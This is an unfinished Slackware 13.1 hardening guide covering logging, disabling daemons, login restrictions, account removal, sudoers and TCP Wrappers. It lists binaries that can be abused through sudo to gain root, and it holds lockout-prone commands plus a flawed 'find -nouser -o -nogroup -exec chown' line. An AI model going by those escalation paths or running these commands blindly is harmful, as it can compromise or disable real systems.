Slackware System Hardening Copyright (c) 2002, 2005, 2006 2011 Jeffrey Denton http://dentonj.freeshell.org/system-hardening-13.1.txt Written by Jeffrey Denton <dentonj@gmail.com> 19 March 2011 Version - 0.9.0 ** NOTE ** Added 20 January 2021 This was never finished. Posting for my own reference. This is written for: $ cat /etc/slackware-version Slackware 13.1.0 This is a list of some of the steps I take to improve the security on my Slackware systems. It is by no means a complete list of everything that is possible. You can either do all of the things listed here, or you can choose the ones you feel would help secure your system. WARNING: Hardening a system is a compromise between security and usability. Some of the things I do would adversely affect the usability of your system and may very well break things. Please have one of the following on hand just in case you lock yourself out of your system: Tom's Rootboot - http://www.toms.net/rb/ The "Live" CD that comes with the official version of Slackware The Slackware Install CDs You should make a backup of anything that you feel is important, would be hard to replace, or that you simply could not do without BEFORE implementing anything listed here. If you don't understand what a setting or configuration is doing, don't use it on your system. The contents of this document is only meant to be used on Slackware Linux. Some of the settings are redundant (defense in depth) or may conflict. You have been warned. Notes: - The settings assume that only one user is on the system, "dentonj", adjust as necessary. - Associated man pages are listed for further information - I will comment this document if I ever get around to it - This is still a draft as there are many TODO items. - Before making changes to a file, it's a good idea to make a copy of the original file: cp syslog.conf syslog.conf.orig ----[ Keep Current ]---- http://www.slackware.com/security/ http://www.slackware.com/lists/ To subscribe to the Slackware Security mailing list, email: majordomo@slackware.com with the phrase "subscribe slackware-security" in the body of the email. ----[ Logging ]---- /etc/rc.d/rc.syslog: echo -n "/usr/sbin/syslogd -m 10 -r -h" /usr/sbin/syslogd -m 10 -r -h root@darkstar:~# /etc/rc.d/rc.syslog restart Increase the timestamp interval from 20 minutes to 10 minutes. It is commonly recommended to set the timestamp interval to 0 to prevent the logs from filling up with "-- MARK --" entries. I've found that these entries are sometimes the only indication that can be used to determine when a system hung or crashed. The "-r" options enables the system to receive syslog messages from the remote hosts. The "-h" option allows syslog to forward messages it receives from remote hosts. The allows syslog messages to be logged on several systems for redundancy. Syslog messages that are sent over the network are not encrypted and can be easily captured. Watch out for syslog forwarding loops when using both "-r" and "-h". There are two security concerns with using syslog to receive logs over the network. The first is the information is not encrypted. The information is vulnerable to being intercepted. The second security concern is the system excepting remote logs is vulnerable to a denial of service attack. An attacker can fill up the filesystem by flooding the syslogd daemon. Use IPTables to restrict who can send traffic to that port. Of course this will not stop someone from spoofing traffic to appear to come from a trusted source. Opens UDP port 514. man syslogd man klogd /etc/syslog.conf # Log everything to a file *.* -/var/log/messages # Log everything to a tty (Ctrl-Alt-F12) *.* /dev/tty12 # Log everything to a log host *.* @192.168.1.2 # Display emergencies to everyone using wall *.=emerg * # Send alerts directly to the user's terminals *.=alert root,dentonj root@darkstar:~# /etc/rc.d/rc.syslog restart The other option to logging everything to one file is have a long syslog.conf file that splits up the logs umoung multiple files. In most cases, the default configuration file will due. Which method you decide on using really comes down to user preference. The "-" keeps syslogd from i syncing the file everytime an entry is written. This is a performance feature that may cause the loss of information if the system crashes. If performance is not a concern or if the idea of losing logging information is a concern, then remove the "-". man syslogd This manpage has a great description of how to deal with troublesome individuals. man syslog.conf /etc/logrotate.conf: weekly rotate 26 create compress shred include /etc/logrotate.d /var/log/wtmp { monthly create 0664 root utmp rotate 6 } /var/log/btmp { monthly create 0600 root root rotate 6 } Logrotate is run at 4:40 everyday by cron. The file that starts logrotate is /etc/cron.daily/logrotate. I like to keep logs for 6 months. Most people will think this is excessive. Make sure you have enough hard drive space to store 6 months worth of logs. root@darkstar:~# less /var/lib/logrotate/status This file will give you the status on what log files are configured to be rotated and the last time they were rotated. Make sure that you have you have not missed a log file. root@darkstar:~# last root@darkstar:~# last -f /var/log/wtmp.1.gz root@darkstar:~# lastb root@darkstar:~# lastb -f /var/log/btmp.1.gz man logrotate /etc/logrotate.d/syslog: /var/log/cron /var/log/debug /var/log/maillog /var/log/messages /var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog { create 0640 root root #mail dentonj@gmail.com #mailfirst sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid \ 2> /dev/null || true` endscript } Even though I log everything to one file, I setup logrotate to backup all of the log files. The only logs that I'm not interested in retaining are those for Xorg or dmesg. Daemons such as Apache and vsftpd will have logrotate.d settings listed below. man logrotate /etc/rc.d/rc.S: # Update the current kernel level in the /etc/motd (Message Of The Day) file, # if the first line of that file begins with the word 'Linux'. # You are free to modify the rest of the file as you see fit. #if [ -x /bin/sed ]; then # /bin/sed -i "{1s/^Linux.*/$(/bin/uname -sr)\./}" /etc/motd #fi The last 3 lines are uncommented by default. Since I like to set a custom message and provide a little less information about the systme, I comment out the above line. The default comment above is self explanatory. man motd /etc/motd, /etc/issue.net, /boot/boot_message.txt: **************************************************************** Unauthorized access prohibited; all access and activities not explicitly authorized by the administrator are unauthorized. All activities are monitored and logged. There is no privacy on this system. Unauthorized access and activities or any criminal activity will be reported to appropriate authorities. **************************************************************** Or: "You seem to be lost. Please return to your little corner of the Internet." I use the first message for anyone that is logging into a system. From what I've been told, if you don't have some sort of default message that indicates that there is no privacy on this computer, there is the chance that logs from it used in a court may possibly be thrown out. I've also been told the opposite is true. But since that lawyer did not represent me or look out for my best interests, I'll stick with the message. I use the second message when I don't care about pursuing legal actions for unauthorized activities and want to let the offender know this isn't your ordinary computer. Since we make a change to the message given by the boot loader, we have to rerun lilo. root@darkstar:~# lilo -v -p If lilo returns an error, try to determine what the problem is and rerun lilo before you reboot the system. Otherwise, you may end up with a system that doesn't boot properly. man issue man motd man lilo /etc/rc.d/rc.local: # Log icmp packets to syslog /usr/sbin/icmpinfo -v -n -p -s -l This will log icmp packets to syslog, except pings. There is the potential problem that someone could flood your logs and fill up your hard drive while logging ICMP packets. man icmpinfo /sbin/accton: Account processing is turned on by /etc/rc.d/rc.M. However, the log file doesn't exist. root@darkstar:~# touch /var/log/pacct man ac man 2 acct man 5 acct man accton man sa man lastcomm info accounting root@darkstar:~# ac -d root@darkstar:~# ac -p /etc/rc.d/rc.M: Increase logging in cron. /usr/sbin/crond -l7 >> /var/log/cron 2>&1 man crond ----[ Disable Daemons/Close Ports ]---- List the open sockets: root@darkstar:~# netstat -peanutgw Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN 0 4117 1546/inetd tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 0 5556 1711/X tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 0 4120 1546/inetd tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 4151 1555/sshd tcp6 0 0 :::6000 :::* LISTEN 0 5555 1711/X tcp6 0 0 :::22 :::* LISTEN 0 4153 1555/sshd udp 0 0 0.0.0.0:512 0.0.0.0:* 0 4119 1546/inetd udp 0 0 0.0.0.0:37 0.0.0.0:* 0 4118 1546/inetd raw 0 0 0.0.0.0:1 0.0.0.0:* 7 0 7764 2250/icmpinfo IPv6/IPv4 Group Memberships Interface RefCnt Group --------------- ------ --------------------- lo 1 224.0.0.1 lo 1 ff02::1 eth0 1 ff02::1 wlan0 1 ff02::1 /etc/inetd.conf: The following are running by default: time - TCP port 37 time - UDP port 37 auth - TCP port 113 comsat - UDP port 512 Comment out the lines of the services that you don't need. root@darkstar:~# grep -v "^#" /etc/inetd.conf man inetd man in.comsat man in.identd man grep /etc/rc.d/rc.inetd: root@darkstar:~# /etc/rc.d/rc.inetd stop root@darkstar:~# chmod a-x /etc/rc.d/rc.inetd man inetd man chmod /usr/X11R6/bin/startx: defautserverargs="-nolisten tcp" Closes TCP port 6000+n, where n is $DISPLAY (the default is 0). man Xserver /etc/X11/xdm/Xservers: :0 local /usr/bin/X -nolisten tcp :0 Closes TCP port 6000. man Xserver man xdm /etc/X11/xdm/Xaccess: Make sure everything is commented. man xdm /etc/rc.d/rc.4: exec /usr/bin/xdm -nodaemon -udpPort 0 exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0 Closes UDP port 177. man xdm /etc/X11/fs/config: use-syslog = yes no-listen = tcp Closes TCP port 7100. man xfs /etc/rc.d/rc.inet2: Most of the rc.scripts are started here. From the script: "Uncomment or comment out sections depending on which services you site requires." There are three ways to stop daemons and services from being started. The first way is to make the script starting the daemon or service non- executable: chmod 600 /etc/rc.d/rc.bind The second way is to comment out the sections of this script that starts the daemon or service: Lines 95-97: # Start the BIND name server daemon: # if [ -x /etc/rc.d/rc.bind ]; then # /etc/rc.d/rc.bind start # fi If you are not going to use the services, you can remove the package. Removing the package will not remove the rc.script. The scripts are installed with the name rc.script.new and then renamed to rc.script. root@darkstar:~# removepkg bind Comment out the following lines: Lines 20 - 37: Disable mounting of NFS filesystems Lines 43 - 45: Disable RPC portmapper Lines 63 - 68: Disable mount of SMB filesystems Lines 79 - 81: Disable IPv4 packet forwarding Lines 84 - 86: Disable inetd Lines 95 - 97: Disable BIND Lines 100 - 102: Disable NIS Lines 109 - 111: Disable NFS server /etc/rc.d/rc.M: Comment out the following lines: Lines 187 - 189: Disable dnsmasq Lines 141 - 143: Disable snmpd Lines 197 - 203: Disable CUPS and lpd Lines 206 - 208: Disable netatalk Lines 259 - 261: Disable atd Lines 296 - 298: Disable saslauthd Lines 301 - 303: Disable sendmail Lines 321 - 323: Disable MySQL Lines 326 - 328: Disable Apache Lines 331 - 333: Disable OpenLDAP Lines 337 - 339: Disable Samba Lines 347 - 349: Disable SystemV init scripts /etc/rc.d/rc.acpid: Advanced Configuration and Power Interface event daemon root@darkstar:~# /etc/rc.d/rc.acpid stop root@darkstar:~# chmod 600 /etc/rc.d/rc.acpid Or: root@darkstar:~# removepkg acpid root@darkstar:~# rm -i /etc/rc.d/rc.acpid This daemon doesn't open any ports. /etc/rc.d/rc.alsa: Advanced Linux Sound Architecture root@darkstar:~# /etc/rc.d/rc.alsa stop root@darkstar:~# chmod 600 /etc/rc.d/rc.alsa Or: root@darkstar:~# removepkg alsa-utils root@darkstar:~# removepkg alsa-lib root@darkstar:~# removepkg alsa-oss root@darkstar:~# rm -i /etc/rc.d/rc.alsa This daemon doesn't open any ports. /etc/rc.d/rc.atalk: AppleTalk root@darkstar:~# /etc/rc.d/rc.atalk stop root@darkstar:~# chmod 600 /etc/rc.d/rc.atalk Or: root@darkstar:~# removepkg netatalk root@darkstar:~# rm -i /etc/rc.d/rc.atalk Closes TCP port 548. /etc/rc.d/rc.autofs: Automount for FILE, NIS, and LDAP root@darkstar:~# /etc/rc.d/rc.autofs stop root@darkstar:~# chmod 600 /etc/rc.d/rc.autofs Or: root@darkstar:~# removepkg autofs root@darkstar:~# rm -i /etc/rc.d/rc.autofs This daemon doesn't open any ports. /etc/rc.d/rc.bind: BIND root@darkstar:~# /etc/rc.d/rc.bind stop root@darkstar:~# chmod 600 /etc/rc.d/rc.bind Or: root@darkstar:~# removepkg bind root@darkstar:~# rm -i /etc/rc.d/rc.bind Closes TCP ports 53 and 953. Closes UDP ports 53 and 32768. /etc/rc.d/rc.bluetooth: Bluetooth stack for Linux root@darkstar:~# /etc/rc.d/rc.bluetooth stop root@darkstar:~# chmod 600 /etc/rc.d/rc.bluetooth Or: root@darkstar:~# removepkg bluez root@darkstar:~# removepkg bluez-fireware root@darkstar:~# removepkg bluez-hcidump root@darkstar:~# rm -i /etc/rc.d/rc.bluetooth /etc/rc.d/rc.cups: Common UNIX Printing System root@darkstar:~# /etc/rc.d/rc.cups stop root@darkstar:~# chmod 600 /etc/rc.d/rc.cups Or: root@darkstar:~# removepkg cups root@darkstar:~# rm -i /etc/rc.d/rc.cups Closes TCP and UDP port 631. /etc/rc.d/rc.dnsmasq: A lightweight DHCP and caching DNS server root@darkstar:~# /etc/rc.d/rc.dnsmasq stop root@darkstar:~# chmod 600 /etc/rc.d/rc.dnsmasq Or: root@darkstar:~# removepkg dnsmasq root@darkstar:~# rm -i /etc/rc.d/rc.dnsmasq Closes TCP and UDP port 53, 67, and 68. /etc/rc.d/rc.fuse: Filesystem in Userspace root@darkstar:~# /etc/rc.d/rc.fuse stop root@darkstar:~# chmod 600 /etc/rc.d/rc.fuse Or: root@darkstar:~# removepkg fuse root@darkstar:~# rm -i /etc/rc.d/rc.fuse This daemon doesn't open any ports. /etc/rc.d/rc.gpm: General Purpose Mouse, you will more than likely want to keep this. root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm This daemon doesn't open any ports. /etc/rc.d/rc.hald: The HAL Hardware Abstraction Layer, you will more than likely want to keep this. root@darkstar:~# chmod go-rxw /etc/rc.d/rc.hald This daemon doesn't open any ports. /etc/rc.d/rc.httpd: Apache webserver root@darkstar:~# /etc/rc.d/rc.httpd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.httpd Or: root@darkstar:~# removepkg httpd root@darkstar:~# rm -i /etc/rc.d/rc.httpd Closes TCP port 80. /etc/rc.d/rc.inetd: The Internet daemon root@darkstar:~# /etc/rc.d/rc.inetd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.inetd Or: root@darkstar:~# removepkg inetd root@darkstar:~# rm -i /etc/rc.d/rc.inetd Closes TCP ports 37 and 113 (by default). Closes UDP ports 37 and 512 (by default). /etc/rc.d/rc.ip_forward: IPv4 Packet Forwarding root@darkstar:~# /etc/rc.d/rc.ip_forward stop root@darkstar:~# chmod 600 /etc/rc.d/rc.ip_forward The script is part of a package of network scripts that should not be removed. /etc/rc.d/rc.messagebus: D-Bus message bus system root@darkstar:~# /etc/rc.d/rc.messagebus stop root@darkstar:~# chmod 600 /etc/rc.d/rc.messagebus Or: root@darkstar:~# cd /var/log/packages && removepkg dbus* root@darkstar:~# rm -i /etc/rc.d/rc.messagebus /etc/rc.d/rc.mysqld: The MySQL server daemon By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for details on how to start the daemon. The script prevents incoming network connections by default with the "--skip-networking" option. If this option is commented out, TCP port 3306 will be opened. root@darkstar:~# /etc/rc.d/rc.mysqld stop root@darkstar:~# chmod 600 /etc/rc.d/rc.mysqld Or: root@darkstar:~# removepkg mysql root@darkstar:~# rm -i /etc/rc.d/rc.mysqld This daemon doesn't open any ports by default. /etc/rc.d/rc.nfsd: The kfnsd NFS daemon By default, the deamon will not start because the file /etc/exports is not configured properly. root@darkstar:~# /etc/rc.d/rc.nfsd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.nfsd Or: root@darkstar:~# removepkg nfs-utils root@darkstar:~# rm -i /etc/rc.d/rc.nfsd /etc/rc.d/rc.ntpd: Network Time Protocol root@darkstar:~# /etc/rc.d/rc.ntpd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.ntpd Or: root@darkstar:~# removepkg ntp root@darkstar:~# rm -i /etc/rc.d/rc.ntpd Closes TCP and UDP port 123. /etc/rc.d/rc.rpc: RPC portmapper root@darkstar:~# /etc/rc.d/rc.rpc stop root@darkstar:~# chmod 600 /etc/rc.d/rc.rpc Or: root@darkstar:~# removepkg portmap root@darkstar:~# rm -i /etc/rc.d/rc.rpc /etc/rc.d/rc.samba: The Samba SMB file/print server By default, the daemon will not start because the file /etc/samba/smb.conf is not present. root@darkstar:~# /etc/rc.d/rc.samba stop root@darkstar:~# chmod 600 /etc/rc.d/rc.samba Or: root@darkstar:~# removepkg samba root@darkstar:~# rm -i /etc/rc.d/rc.samba /etc/rc.d/rc.saslauthd: Simple Authentication and Security Layer root@darkstar:~# /etc/rc.d/rc.saslauthd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.saslauthd Or: root@darkstar:~# removepkg cyrus-sasl root@darkstar:~# rm -i /etc/rc.d/rc.saslauthd /etc/rc.d/rc.sendmail: Sendmail root@darkstar:~# /etc/rc.d/rc.sendmail stop root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail Or: root@darkstar:~# removepkg sendmail root@darkstar:~# removepkg sendmail-cf root@darkstar:~# rm -i /etc/rc.d/rc.sendmail Closes TCP ports 25 and 587. /etc/rc.d/rc.snmpd: Simple Network Management Protocol root@darkstar:~# /etc/rc.d/rc.snmpd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.snmpd Or: root@darkstar:~# removepkg net-snmp root@darkstar:~# rm -i /etc/rc.d/rc.snmpd /etc/rc.d/rc.sshd: The Secure Shell Server root@darkstar:~# /etc/rc.d/rc.sshd stop root@darkstar:~# chmod 600 /etc/rc.d/rc.sshd Or: root@darkstar:~# removepkd openssh root@darkstar:~# rm -i /etc/rc.d/rc.sshd Closes TCP port 22. /etc/rc.d/rc.syslog: The system logging daemon, you will more than likely want to keep this. If the "-r" option is used, UDP port 514 is opened. This daemon doesn't open any ports by default. root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog /etc/rc.d/rc.sysstat: System performance monitoring tools root@darkstar:~# /etc/rc.d/rc.sysstat stop root@darkstar:~# chmod 600 /etc/rc.d/rc.sysstat Or: root@darkstar:~# removepkd sysstat root@darkstar:~# rm -i /etc/rc.d/rc/sysstat /etc/rc.d/rc.sysvinit: "This file provides basic compatibility with SystemV style startup scripts." Unless you have installed a daemon that requires the use of SystemV style startup scripts, there is no need for it to be executable. root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit /etc/rc.d/rc.udev: "udev provides a dynamic device directory containing only the files for actually present devices. It creates and removes device node files usually located in the /dev directory." You will more than likely want to keep this. This daemon doesn't open any ports. root@darkstar:~# chmod 600 /etc/rc.d/rc.udev man udev /etc/rc.d/rc.wireless.conf: This file holds the configuration settings used by /etc/rc.d/rc.wireless. The file may hold encryption keys in plain text. Make sure that users are not able read this file (the default setting). root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf /etc/rc.d/rc.yp: The Network Information Service The contents of this file is commented out by default. root@darkstar:~# chmod 600 /etc/rc.d/rc.yp Or: root@darkstar:~# removepkg yptools root@darkstar:~# rm -i /etc/rc.d/rc.yp ----[ Limit Access ]---- /etc/rc.d/rc.M: chmod 1733 /tmp /var/tmp Prevents users for looking at the contents of those directories. It still allows them to create, access, and modify files in those directories if they know the actual file name. This does not stop users from running executables in /tmp. dentonj@darkstar:~$ ls -ld /tmp drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/ dentonj@darkstar:~$ cp /bin/date /tmp/test dentonj@darkstar:~$ /tmp/test Thu Jun 27 12:55:00 MST 2001 dentonj@darkstar:~$ ls /tmp ls: /tmp: Permission denied man chmod /etc/rc.d/rc.S: chmod 1733 /tmp/.ICE-unix chmod 1733 /tmp/.X11-unix Don't let everyone have read access to utmp: chmod 660 /var/run/utmp man utmp man chmod /etc/lilo.conf: # mandatory - enter a password with every boot # restricted - enter a password only when a boot time parameter # is used (e.g. - "linux single") # Pick one mandatory #restricted # Use the "-p" option with the lilo command to store the hashed password # in a separate file password="" prompt timeout=0 #menu-title="Unauthorized Access Prohibited" message=/boot/boot_message.txt serial=0,9600n8 root@darkstar:~# lilo -v -p root@darkstar:~# chmod go-rwx /etc/lilo.conf Using the setting 'password=""' and then the '-p' option with lilo will prompt you to enter a pass phrase while lilo is running. The pass phrase is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way, it's better than having the password listed in /etc/lilo.conf in plain text. The configuration options above will require the password to be entered whenever the system boots. You may not want to use the "mandatory" setting if uptime is important or when you normally only access the system remotely. In these cases, use "restricted" instead. man lilo man lilo.conf /etc/login.access: +:root dentonj:LOCAL -:ALL:ALL Only root and dentonj can login locally. This does not affect logging in via ssh. Error generated: "Login incorrect" man login.access /etc/login.defs: FAIL_DELAY 15 LOG_UNKFAIL_ENAB yes LOG_OK_LOGINS yes SULOG_FILE /var/log/sulog ISSUE_FILE /etc/issue #HUSHLOGIN_FILE UMASK 077 PASS_MAX_DAYS 90 PASS_MIN_LEN 18 ENCRYPT_METHOD SHA512 SHA_CRYPT_MIN_ROUNDS 500000 SHA_CRYPT_MAX_ROUNDS 500000 DEFAULT_HOME no #ENVIRON_FILE root@darkstar:~# touch /var/log/sulog root@darkstar:~# passwd root@darkstar:~# chage -M 90 -W 7 root root@darkstar:~# chage -M 90 -W 7 dentonj dentonj@darkstar:~$ passwd Setting the number of SHA rounds to 500000 means that it takes a little longer to login. If you are using a slow computer, you may have to adjust the number of rounds used. man login.defs man passwd /etc/suauth: ALL:ALL EXCEPT dentonj:DENY Or: ALL:ALL EXCEPT GROUP wheel:DENY root@darkstar:~# usermod -g users -G wheel dentonj root@darkstar:~# chmod go-rwx /etc/suauth Only dentonj is allowed to switch users. Or, only members of the wheel group can switch users. Error generated: "Access to su to that account DENIED." "You are not authorized to su root" man suauth /etc/porttime: *:root,dentonj:Al0000-2400 *:*: root@darkstar:~# chmod go-rwx /etc/porttime The third field specifies when someone can login. If the field is empty, then the user is not able to login. The "*:*:" entry is a default deny rule to catch everyone not already listed. The third field lists the times that a user is allowed to login. If that field is empty, the user is not allowed to login. The daemon logoutd is normally run to enforce the login time restrictions listed in /etc/porttime. Error generated: "Invalid login time" man porttime /etc/rc.d/rc.local: # Enforce login time restrictions set in /etc/porttime if [ -x /usr/sbin/logoutd ]; then /usr/sbin/logoutd fi man logoutd /etc/limits: dentonj C0L1 * L0 root@darkstar:~# chmod go-rwx /etc/limits The setting "* L0" is a default rule for anyone not previously listed. The number of logins permitted is set to zero, which means anyone not previously listed is not allowed to login. This does not affect root. Don't let users create core dumps. Error generated: "Too many logins." man limits /etc/shells: Allowing users to run different shells allows them to bypass any security restrictions set on their login shell. Delete the following: /bin/ash /bin/csh /bin/ksh /bin/tcsh /bin/zsh root@darkstar:~# removepkg ash root@darkstar:~# removepkg ksh93 root@darkstar:~# removepkg tcsh root@darkstar:~# removepkg zsh man shells /usr/sbin/faillog: root@darkstar:~# faillog -u dentonj -m 10 root@darkstar:~# faillog -a Don't set faillog for root. This is one of the few settings that can actually stop root from logging in. Using faillog can cause a denial of service if the maximum number of logins is reached. Use faillog with caution. Error generated: "Login incorrect" man faillog /etc/passwd: According to the Linux Standard Base Specification 4.1, the only required user accounts are root, bin, and daemon. All other accounts are optional. Delete any unused accounts. The following lists the number of files and directores that are owned by each account. root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do > echo -n "$i - " > find / -user $i -ignore_readdir_race | wc -l > done root - 374210 bin - 3 daemon - 10 adm - 0 lp - 1 sync - 0 shutdown - 0 halt - 0 mail - 0 news - 46 uucp - 17 operator - 0 games - 4 ftp - 0 smmsp - 1 mysql - 2 rpc - 0 sshd - 0 gdm - 0 oprofile - 0 apache - 0 messagebus - 7 haldaemon - 14 pop - 0 nobody - 3 dentonj - 2595 Your numbers may vary. To list the files owned by a particular user: root@darkstar:~# find / -user nobody -ls Logins and ownership of files and directories is not the only use for accounts. They can also be used to run daemons as a non-root user. The current processes and the accounting information can be used to determine which accounts are used. root@darkstar:~# ps -eo euser,ruser,suser,fuser,f,comm,label root@darkstar:~# sa -m root@darkstar:~# lastcomm By default, the unused accounts have there shell set to /bin/false. This prevents the accounts from being used interactively. Some argue that deleting the accounts is excessive and unnecessary. I delete them. Error generated when logging into an account with the shell set as /bin/false (from Slackware 11.0): darkstar login: test Password: ************************* Linux 2.4.32 Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2 No mail. Welcome to Linux 2.4.32 (tty2) darkstar login: The unused accounts may vary and depend on the daemons that run on your system. I typically delete the following: root@darkstar:~# userdel adm adm games gdm halt lp news operator oprofile pop rpc shutdown sync uucp The accounts sync, halt, and shutdown don't work by default. They allow someone to su or login to sync, halt, or shutdown the system. A password would have to be set before they work, as well as add them to any of the other files that can be used to restrict logins or the use of su. Unless you really want to give someone the ability to do any of the three, it's safe to delete the accounts. root@darkstar:~# su halt halt: must be superuser. root@darkstar:~# su shutdown shutdown: you must be root to do that! root@darkstar:~# userdel halt root@darkstar:~# userdel shutdown root@darkstar:~# userdel sync Password aging: Note: Don't use this if you like to make the /etc/passwd and the /etc/shadow files immutable (chattr +i ...). It gets ugly... If you let the password expire, you will not be able to login until you reset the password. But if the /etc/shadow file is immutable and cannot be changed, then you will not be able to login. To fix the problem, you would have to boot tomsrtbt or a Linux boot CD, mount the hard drive partition where /etc is located, and remove the immutable attribute from /mnt/etc/shadow (chattr -i ...). Set the maximum number of days a password remains valid. For users, disable the account after the password has expired and the account remains inactive for 30 days. root@darkstar:~# passwd -x 90 -w 7 root root@darkstar:~# passwd -x 90 -w 7 -i 30 dentonj Check the status of each account and the integrity of the passwd file: root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do > passwd -S $i > done root@darkstar:~# pwck man 1 passwd man 5 passwd man find man userdel man false man pwck man ps man sa man lastcomm /etc/group: According to the Linux Standard Base Specification 4.1, the only required groups are root, bin, and daemon. All other groups are optional. Delete any unused groups. The following lists the number of files and directores that belong to each group: root@darkstar:~# for i in `cat /etc/group | awk -F: '{print $1}'`; do > echo -n "$i - " > find / -group $i -ignore_readdir_race | wc -l > done root - 373328 bin - 83 daemon - 11 sys - 1 adm - 0 tty - 147 disk - 31 lp - 12 mem - 0 kmem - 3 wheel - 0 floppy - 26 mail - 6 news - 47 uucp - 16 man - 0 dialout - 4 audio - 12 video - 3 cdrom - 2 games - 0 slocate - 3 utmp - 4 smmsp - 3 tape - 0 mysql - 2 rpc - 0 sshd - 0 gdm - 0 shadow - 4 ftp - 0 oprofile - 0 apache - 1 messagebus - 7 haldaemon - 14 plugdev - 2 power - 0 netdev - 0 pop - 0 scanner - 1 nobody - 2 nogroup - 2 users - 2700 console - 0 Your numbers may vary. To list the files owned by a particular group: root@darkstar:~# find / -group nobady -ls root@darkstar:~# groupdel adm Repeat for the following: adm games lp news pop uucp root@darkstar:~# grpck Removing accounts may create a long list of files that no longer belong to any user or group. If you are interested what the files are: root@darkstar:~# find / -nouser -o -nogroup -ls > unowned.out To change the ownership of the files: root@darkstar:~# find / -nouser -o -nogroup -exec chown root.root {} \; man group man find man groupdel man grpck man chown /etc/sudoers: Defaults runaspw Defaults ! root_sudo Defaults ignore_dot Defaults tty_tickets Defaults requiretty Defaults listpw=always Defaults verifypw=always Defaults !path_info Defaults noexec Defaults passwd_timeout=1 Defaults env_reset Defaults insults %wheel ALL=(ALL) ALL root@darkstar:~# groups dentonj dentonj : users root@darkstar:~# usermod -g users -G wheel dentonj root@darkstar:~# groups dentonj dentonj : users wheel root@darkstar:~# mkdir /var/run/sudo There are a number a security concerns when allowing users to use sudo. Make sure you completely read the man pages for sudo and sudoers. There are generally two approaches when configuring sudo. The first is to allow the user to run any command. This is essentially giving them su access to root. The second approach is to configuring sudo is to only allow a limited number of commands to be run. If you are going to use the second approach, there are a few commands that you don't want to allow the user to run. These commands can be abused to give the user full access to the system. Make sure you don't add the following or those listed in the Shell Escapes section below to the /etc/sudoers file: /bin/cat /bin/chmod /bin/chown /bin/cpio /bin/mount /bin/rpm /bin/tar /sbin/installpkg /usr/bin/env /usr/sbin/useradd /usr/sbin/usermod This list should be much longer. root@darkstar~# sudo -V root@darkstar~# sudo -L man sudo man sudoers man visudo man groups man usermod /etc/ftpusers: This file is used to deny anyone listed from being able to log into the local ftp server. Add the following: bin daemon haldaemon mail smmsp messagebus mysql sshd nobody Add all system accounts that are present in /etc/passwd. man ftpusers /etc/host.conf: nospoof on spoofalert on spoof warn man host.conf /etc/hosts.allow: TCP Wrappers all:local:banners /etc/banners:allow sshd:192.168.1.:banners /etc/banners:allow sendmail:all:banners /etc/banners:allow all:paraniod:spawn /usr/bin/logger "%d deny paraniod %c %p %a %h %u" \ :banners /etc/banners:deny all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \ :banners /etc/banners:deny From `man hosts_options`: banners /some/directory Look for a file in `/some/directory` with the same name as the daemon process (for example in.telnetd for the telnet service), and copy its contents to the client. If you are using any of the services listed below, make sure you add an allow rule for it. If you want a different banner for a particular service, delete the symlink and create a text file with the same name. root@darkstar:~# mkdir /etc/banners && cd /etc/banners root@darkstar:/etc/banners# ln -s ../issue.net afpd root@darkstar:/etc/banners# ln -s ../issue.net imapd root@darkstar:/etc/banners# ln -s ../issue.net in.identd root@darkstar:/etc/banners# ln -s ../issue.net in.rexecd root@darkstar:/etc/banners# ln -s ../issue.net in.rlogind root@darkstar:/etc/banners# ln -s ../issue.net in.rshd root@darkstar:/etc/banners# ln -s ../issue.net in.telnetd root@darkstar:/etc/banners# ln -s ../issue.net popa3d root@darkstar:/etc/banners# ln -s ../issue.net proftpd root@darkstar:/etc/banners# ln -s ../issue.net rpc.mound root@darkstar:/etc/banners# ln -s ../issue.net sendmail root@darkstar:/etc/banners# ln -s ../issue.net sshd root@darkstar:/etc/banners# ln -s ../issue.net stunnel root@darkstar:/etc/banners# ln -s ../issue.net uucico root@darkstar:/etc/banners# ln -s ../issue.net vsftpd A command that can be used to determine which daemons use TCP Wrappers: root@darkstar:~# cd /usr/sbin; for i in `ls | grep -v "@$"`; do \ echo " $i"; strings $i | grep hosts.allow; done | less To test the /etc/hosts.allow settings: root@darkstar:~# tcpdchk root@darkstar:~# tcpdmatch sshd localhost root@darkstar:~# tcpdmatch sshd 1.1.1.1 root@darkstar:~# tcpdmatch sshd 192.168.1.1 man tcpd man 5 hosts_access man hosts_options man tcpdchk man tcpdmatch /etc/hosts.deny: The only time this file will match is when /etc/hosts.allow is misconfigured. all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \ :banners /etc/banners:deny man tcpd man 5 hosts_access man hosts_options xdm: /etc/X11/xdm/xdm-config: DisplayManager*authorize: true DisplayManager*authName: XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1 DisplayManager.requestPort: 0 man xdm /etc/X11/xdm/Xresources: xlogin*greeting: Unauthorized Access Prohibited xlogin*allowRootLogin: false xlogin*allowNullPasswd: false man xdm xhost: dentonj@darkstar:~$ xhost access control enabled, only authorized clients can connect 